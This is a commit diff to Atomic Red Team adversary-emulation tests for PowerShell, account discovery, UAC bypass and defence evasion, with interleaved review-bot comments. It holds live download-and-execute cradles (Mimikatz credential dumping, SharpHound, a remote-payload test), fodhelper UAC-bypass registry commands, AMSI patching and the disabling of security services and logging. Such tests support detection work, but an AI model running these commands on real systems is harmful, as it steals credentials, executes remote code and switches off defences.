T1086 T1087 T1088 T1089 Updates (#944)

* 1087 Updates

* add 1086 Updates

* add T1088 updates

* update T1089

* typo fix

* typo fix

* typo fix

* fix input args

* remove uninstall sysmon changes

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Andrew Beers
2020-04-28 11:57:01 -05:00
committed by GitHub
parent 7802132b9e
commit 18f618f20b
4 changed files with 30 additions and 75 deletions
+11 -28
@@ -19,11 +19,11 @@ atomic_tests:
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
- name: Run BloodHound from local disk
- name: Run BloodHound from local disk
description: |
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
supported_platforms:
- windows
input_arguments:
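Review bot: the description still says the data is stored "to the temp directory on the machine", but the command in the following hunk passes -OutputDirectory #{output_path}, whose default in this file is PathToAtomicsFolder\T1086\src; the in-memory variant's description already reads "store the data to #{output_path}", so use that wording here as well so the documented artifact location matches what the test actually does.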
@@ -39,7 +39,7 @@ atomic_tests:
description: Output path for BloodHound reports
type: String
default: PathToAtomicsFolder\T1086\src
dependency_executor_name: powershell
dependencies:
- description: |
@@ -55,7 +55,7 @@ atomic_tests:
command: |
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
cleanup_command: |
Remove-Item #{file_path}\SharpHound.ps1 -Force
Remove-Item #{file_path}\*BloodHound.zip -Force
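Review bot: the cleanup removes #{file_path}\*BloodHound.zip while the command writes its output through -OutputDirectory #{output_path}; unless both arguments default to the same folder, the zip is left behind after the test. The second Remove-Item should target #{output_path}\*BloodHound.zip, as the remote-download test's cleanup below already does.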
@@ -64,7 +64,7 @@ atomic_tests:
description: |
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
supported_platforms:
- windows
input_arguments:
@@ -78,14 +78,13 @@ atomic_tests:
command: |
write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
cleanup_command: |
Remove-Item #{output_path}\*BloodHound.zip -Force
- name: Obfuscation Tests
description: |
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
supported_platforms:
- windows
executor:
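Review bot: the expected result for the Obfuscation Tests depends on the bit.ly/L3g1t short link resolving to the intended script, which the repository does not control, so the output promised in the merged description ("SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION") cannot be guaranteed over time. Pin the payload to a commit-specific raw URL the way the SharpHound download in this hunk does (the 804503962b... revision) so the test stays reproducible and reviewers can see exactly what is fetched.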
@@ -109,9 +108,9 @@ atomic_tests:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Upon execution windows backup and restore window will be opened
supported_platforms:
- windows
executor:
@@ -120,24 +119,6 @@ atomic_tests:
command: |
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
- name: Powershell MsXml COM object - no prompt
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell MsXml COM object - with prompt
description: |
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
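Review bot: the deletion of the "Powershell MsXml COM object - no prompt" test is not mentioned in the commit message, which lists only updates, typo fixes and the Sysmon revert. If the intent is deduplication against the "- with prompt" variant, say so; note that the removed variant was the only one exercising -exec bypass -windowstyle hidden -noprofile, flags that detection content commonly keys on, so the remaining test validates less than the pair did.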
@@ -223,6 +204,8 @@ atomic_tests:
- name: PowerShell Downgrade Attack
description: |
This test requires the manual installation of PowerShell V2.
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
supported_platforms:
- windows
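Review bot: the new prerequisite "requires the manual installation of PowerShell V2" is stated only in prose. This file already uses dependency_executor_name and a dependencies block with a description (see the BloodHound test above), so express it as a dependency with a prereq_command that checks whether the 2.0 engine is present; the runner will then report the missing prerequisite instead of the test failing silently.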
+4 -4
@@ -124,7 +124,7 @@ atomic_tests:
- name: Enumerate all accounts via PowerShell
description: |
Enumerate all accounts via PowerShell
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
supported_platforms:
- windows
executor:
@@ -143,9 +143,9 @@ atomic_tests:
get-localgroup
net localgroup
- name: Enumerate logged on users
- name: Enumerate logged on users via CMD
description: |
Enumerate logged on users
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
supported_platforms:
- windows
executor:
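Review bot: "exeuction" in the added description line is misspelled and should be "execution"; the same typo appears in the next hunk's "Enumerate logged on users via PowerShell" description.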
@@ -156,7 +156,7 @@ atomic_tests:
- name: Enumerate logged on users via PowerShell
description: |
Enumerate logged on users via PowerShell
Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed.
supported_platforms:
- windows
executor:
+3 -3
@@ -47,7 +47,7 @@ atomic_tests:
- name: Bypass UAC using Fodhelper
description: |
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
supported_platforms:
- windows
@@ -62,7 +62,7 @@ atomic_tests:
elevation_required: false
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
fodhelper.exe
cleanup_command: |
reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
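Review bot: adding /f to the second reg.exe add is the right fix, not a cosmetic one: without it, reg.exe prompts to confirm overwriting an existing DelegateExecute value on any rerun (the first add already had /f), so an unattended run would hang waiting for input. The description's "The operation completed successfully." appearing twice now matches the two adds.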
@@ -70,7 +70,7 @@ atomic_tests:
- name: Bypass UAC using Fodhelper - PowerShell
description: |
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution command prompt will be opened.
supported_platforms:
- windows
+12 -40
@@ -210,6 +210,8 @@ atomic_tests:
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
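Review bot: the first description line carries two typos in the context lines: "Any easy way" should be "An easy way" and "is it patch the dll" should be "is to patch the DLL". Since this hunk already edits the description, fix them here.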
@@ -219,12 +221,13 @@ atomic_tests:
command: |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
cleanup_command: |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) -ErrorAction Ignore
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
supported_platforms:
- windows
executor:
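Review bot: dropping -ErrorAction Ignore from the cleanup line is a correctness fix rather than a typo fix: -ErrorAction is a cmdlet common parameter and cannot follow a .NET method call, so the old cleanup line did not parse and never reset amsiInitFailed, leaving AMSI disabled on the host after the test. Worth stating in the commit message, since "typo fix" undersells it.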
@@ -232,12 +235,14 @@ atomic_tests:
elevation_required: true
command: |
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
cleanup_command: |
cleanup_command: |
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
- name: Disable Arbitrary Security Windows Service
description: |
With administrative rights, an adversary can disable Windows Services related to security products.
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
supported_platforms:
- windows
input_arguments:
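Review bot: the cleanup recreates the provider key with New-Item, but Remove-Item -Recurse also deleted anything stored beneath it; if that key held values or subkeys on the test host, they are not restored. A safer pattern is to export the key with reg.exe export before removing it and import it back on cleanup. Separately, the added description line misspells "exeuction" and "infomration" (execution, information).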
@@ -255,40 +260,6 @@ atomic_tests:
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
- name: Disable PowerShell Script Block Logging
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
cleanup_command: |
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
- name: PowerShell Bypass of AntiMalware Scripting Interface
description: |
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
- name: Tamper with Windows Defender ATP PowerShell
description: |
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
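Review bot: of the three tests removed here, "PowerShell Bypass of AntiMalware Scripting Interface" duplicates the "AMSI Bypass - AMSI InitFailed" command earlier in this file (the same GetField('amsiInitFailed').SetValue call), so dropping it is reasonable deduplication, but "Disable PowerShell Script Block Logging" covers a distinct evasion (zeroing the cachedGroupPolicySettings entries) with no equivalent elsewhere in the diff, and the commit message says nothing about removing tests. Either document the removal or keep or relocate that test so the logging-tamper case is not lost.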
@@ -312,7 +283,8 @@ atomic_tests:
- name: Tamper with Windows Defender Command Prompt
description: |
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
supported_platforms:
- windows
executor:
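Review bot: the added sentence is wrapped mid-sentence ('"Access Denied"' / 'will be displayed twice') inside a literal block scalar (|), so the line break is preserved in the rendered description; keep it on one line or use a folded scalar. While here, "so they still fail as administrator" in the context line reads better as "so they will fail as administrator".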
@@ -343,7 +315,7 @@ atomic_tests:
- name: Disable Microft Office Security Features
description: |
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document
show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
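Review bot: the test name in the context line is misspelled "Microft Office"; since test names are how users select a test from the runner, fix it to "Microsoft Office" in this hunk. The description also splits a sentence across two lines of the literal block ("will not" / "show any warning"), so the added period lands after a preserved line break; join the two lines.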